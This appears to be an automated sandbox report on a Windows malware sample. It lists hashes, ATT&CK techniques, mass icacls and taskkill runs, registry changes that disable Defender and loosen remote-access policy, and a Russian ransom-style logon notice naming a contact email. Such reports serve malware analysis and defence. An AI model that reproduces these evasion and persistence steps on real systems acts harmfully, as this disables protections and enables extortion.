2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
151s
max time network
70s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Size

358KB
MD5

625c0b381462e729abdcca12d424e50a
SHA1

9e20fd6588a16b852d5b1f5ed122706aebce58ac
SHA256

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32
SHA512

48b289d17752bacbe65f46eee9b016264120dff5858bb87609bdfe2a10a1a1c6d12c395dc1bfa6adc8fe24b2b5da48957beec7eb0f38eaa244566ab0ac27c58d

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
2104	icacls.exe
3680	icacls.exe
4460	icacls.exe
4192	icacls.exe
4548	icacls.exe
136	icacls.exe
4364	icacls.exe
748	icacls.exe
4544	icacls.exe
3068	icacls.exe
1428	icacls.exe
4576	icacls.exe
4160	icacls.exe
3844	icacls.exe
4312	icacls.exe
4128	icacls.exe
3908	icacls.exe
4284	icacls.exe
5036	icacls.exe
4668	icacls.exe
4712	icacls.exe
460	icacls.exe
4292	icacls.exe
2340	icacls.exe
4272	icacls.exe
1804	icacls.exe
4532	icacls.exe
2832	icacls.exe
4212	icacls.exe
2856	icacls.exe
4320	icacls.exe
5004	icacls.exe
1240	icacls.exe
4948	icacls.exe
4896	icacls.exe
5040	icacls.exe
4180	icacls.exe
916	icacls.exe
5096	icacls.exe
4656	icacls.exe
988	icacls.exe
4592	icacls.exe
3780	icacls.exe
3492	icacls.exe
2216	icacls.exe
5068	icacls.exe
4872	icacls.exe
1976	icacls.exe
4328	icacls.exe
3632	icacls.exe
2676	icacls.exe
1336	icacls.exe
716	icacls.exe
4408	icacls.exe
4696	icacls.exe
4296	icacls.exe
4204	icacls.exe
1864	icacls.exe
4868	icacls.exe
4536	icacls.exe
4340	icacls.exe
4964	icacls.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Важно."	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Ничего не нарушайте в работе!\r\nНаши IT специалисты Вам помогут\r\nДля этого пишите на почту - [email protected]"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4744	taskkill.exe
1164	taskkill.exe
4844	taskkill.exe
4216	taskkill.exe
4172	taskkill.exe
4396	taskkill.exe
1184	taskkill.exe
4224	taskkill.exe
3892	taskkill.exe
4420	taskkill.exe
4244	taskkill.exe
4756	taskkill.exe
5092	taskkill.exe
4884	taskkill.exe
3680	taskkill.exe
1976	taskkill.exe
4452	taskkill.exe
1344	taskkill.exe
4584	taskkill.exe
4860	taskkill.exe
4508	taskkill.exe
1496	taskkill.exe
4332	taskkill.exe
4684	taskkill.exe
4644	taskkill.exe
4716	taskkill.exe
2732	taskkill.exe
4588	taskkill.exe
4240	taskkill.exe
4484	taskkill.exe
4344	taskkill.exe
4212	taskkill.exe
1232	taskkill.exe
976	taskkill.exe
4204	taskkill.exe
4372	taskkill.exe
4144	taskkill.exe
4380	taskkill.exe
4540	taskkill.exe
2472	taskkill.exe
2732	taskkill.exe
5100	taskkill.exe
1704	taskkill.exe
4132	taskkill.exe
4308	taskkill.exe
2260	taskkill.exe
5032	taskkill.exe
4180	taskkill.exe
916	taskkill.exe
5108	taskkill.exe
3784	taskkill.exe
4476	taskkill.exe
4832	taskkill.exe
1324	taskkill.exe
1496	taskkill.exe
4800	taskkill.exe
3976	taskkill.exe
4564	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2340 reg.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

4044 PING.EXE
5000 PING.EXE
1540 PING.EXE

pid	process
2340	reg.exe

pid	process
4044	PING.EXE
5000	PING.EXE
1540	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

pid	process
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeIncreaseQuotaPrivilege	3836	powershell.exe
Token: SeSecurityPrivilege	3836	powershell.exe
Token: SeTakeOwnershipPrivilege	3836	powershell.exe
Token: SeLoadDriverPrivilege	3836	powershell.exe
Token: SeSystemProfilePrivilege	3836	powershell.exe
Token: SeSystemtimePrivilege	3836	powershell.exe
Token: SeProfSingleProcessPrivilege	3836	powershell.exe
Token: SeIncBasePriorityPrivilege	3836	powershell.exe
Token: SeCreatePagefilePrivilege	3836	powershell.exe
Token: SeBackupPrivilege	3836	powershell.exe
Token: SeRestorePrivilege	3836	powershell.exe
Token: SeShutdownPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeSystemEnvironmentPrivilege	3836	powershell.exe
Token: SeRemoteShutdownPrivilege	3836	powershell.exe
Token: SeUndockPrivilege	3836	powershell.exe
Token: SeManageVolumePrivilege	3836	powershell.exe
Token: 33	3836	powershell.exe
Token: 34	3836	powershell.exe
Token: 35	3836	powershell.exe
Token: 36	3836	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Token: SeDebugPrivilege	3812	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	4180	taskkill.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3784	taskkill.exe
Token: SeSecurityPrivilege	3784	taskkill.exe
Token: SeTakeOwnershipPrivilege	3784	taskkill.exe
Token: SeLoadDriverPrivilege	3784	taskkill.exe
Token: SeSystemProfilePrivilege	3784	taskkill.exe
Token: SeSystemtimePrivilege	3784	taskkill.exe
Token: SeProfSingleProcessPrivilege	3784	taskkill.exe
Token: SeIncBasePriorityPrivilege	3784	taskkill.exe
Token: SeCreatePagefilePrivilege	3784	taskkill.exe
Token: SeBackupPrivilege	3784	taskkill.exe
Token: SeRestorePrivilege	3784	taskkill.exe
Token: SeShutdownPrivilege	3784	taskkill.exe
Token: SeDebugPrivilege	3784	taskkill.exe
Token: SeSystemEnvironmentPrivilege	3784	taskkill.exe
Token: SeRemoteShutdownPrivilege	3784	taskkill.exe
Token: SeUndockPrivilege	3784	taskkill.exe
Token: SeManageVolumePrivilege	3784	taskkill.exe
Token: 33	3784	taskkill.exe
Token: 34	3784	taskkill.exe
Token: 35	3784	taskkill.exe
Token: 36	3784	taskkill.exe
Token: SeDebugPrivilege	4716	taskkill.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeIncreaseQuotaPrivilege	2028	powershell.exe
Token: SeSecurityPrivilege	2028	powershell.exe
Token: SeTakeOwnershipPrivilege	2028	powershell.exe
Token: SeLoadDriverPrivilege	2028	powershell.exe
Token: SeSystemProfilePrivilege	2028	powershell.exe
Token: SeSystemtimePrivilege	2028	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

description	pid	process	target process
PID 620 wrote to memory of 3836	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 3836	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 2028	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 2028	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 3784	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 3784	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 1736	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 1736	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 3984	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 3984	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 2104	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 2104	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 2248	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 2248	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 3812	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 3812	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 2272	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 2272	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 4180	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 4180	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 4328	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 4328	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 4476	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 4476	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 4600	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 4600	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 620 wrote to memory of 4716	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4716	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4132	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4132	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 2340	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	reg.exe
PID 620 wrote to memory of 2340	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	reg.exe
PID 620 wrote to memory of 4756	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4756	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 1184	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 1184	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4764	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	sc.exe
PID 620 wrote to memory of 4764	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	sc.exe
PID 620 wrote to memory of 4992	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	netsh.exe
PID 620 wrote to memory of 4992	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	netsh.exe
PID 620 wrote to memory of 4928	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	sc.exe
PID 620 wrote to memory of 4928	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	sc.exe
PID 620 wrote to memory of 4484	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	Conhost.exe
PID 620 wrote to memory of 4484	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	Conhost.exe
PID 620 wrote to memory of 4848	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	Conhost.exe
PID 620 wrote to memory of 4848	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	Conhost.exe
PID 620 wrote to memory of 1232	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 1232	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4336	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	sc.exe
PID 620 wrote to memory of 4336	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	sc.exe
PID 620 wrote to memory of 4740	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	Conhost.exe
PID 620 wrote to memory of 4740	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	Conhost.exe
PID 620 wrote to memory of 4756	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4756	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 1184	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 1184	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4344	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4344	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4216	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4216	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 1704	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 1704	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4508	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 620 wrote to memory of 4508	620	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Важно."	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Ничего не нарушайте в работе!\r\nНаши IT специалисты Вам помогут\r\nДля этого пишите на почту - [email protected]"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe"
1⤵
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
